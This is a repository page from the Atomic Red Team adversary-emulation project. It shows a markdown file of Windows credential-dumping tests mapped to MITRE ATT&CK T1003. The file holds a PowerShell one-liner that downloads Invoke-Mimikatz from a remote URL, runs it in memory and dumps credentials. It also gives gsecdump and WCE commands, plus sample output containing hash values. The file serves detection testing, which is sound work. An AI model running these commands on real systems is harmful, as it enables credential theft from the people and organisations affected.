security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
29698b61317c8b2547fdac08955ce1cebdace8a0
atomic-red-team/Windows/Credential_Access/Credential Dumping.md
T
caseysmithrc ac8dd2cfec Initial Commit 
Initial Checkin
2017-10-11 10:35:17 -07:00

906 B
Raw Blame History

Credential Dumping

MITRE ATT&CK Technique: T1003

Powershell Mimikatz

Input:

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

Gsecdump

Gsecdump

Input:

gsecdump -a

Windows Credential Editor

Windows Credential Editor

Input:

wce -o output.txt

Output:

C:\>wce -o output.txt
WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

C:\>type output.txt
test:AMPLIALABS:01020304050607080900010203040506:98971234567865019812734576890102
C:\>
Reference in New Issue View Git Blame Copy Permalink